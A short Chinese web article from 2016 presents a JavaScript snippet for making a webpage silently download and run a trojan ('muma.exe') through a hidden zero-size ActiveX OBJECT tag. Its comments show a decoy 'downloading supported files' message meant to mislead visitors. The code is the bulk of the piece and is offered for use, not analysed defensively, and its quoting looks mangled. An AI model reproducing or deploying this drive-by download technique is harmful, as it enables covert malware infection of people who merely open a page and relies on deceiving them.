网页打开后自动执行木马
发布时间:2016-12-29 来源:查字典编辑
摘要:run_exe=""//这里的muma.exe就是我们要运行的程序run_exe+=""run_exe+=""run_exe+="等会......
<scriptlanguage="javascript">
run_exe="<OBJECTID="RUNIT"WIDTH=0HEIGHT=0TYPE="application/x-oleobject""
run_exe+="CODEBASE="muma.exe#version=1,1,1,1">"
//这里的muma.exe就是我们要运行的程序
run_exe+="<PARAMNAME="_Version"value="65536">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>等会......网页在下载支持的文件</H1></HTML>";
//这里是迷惑人的.你可以写其他任何东西.
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>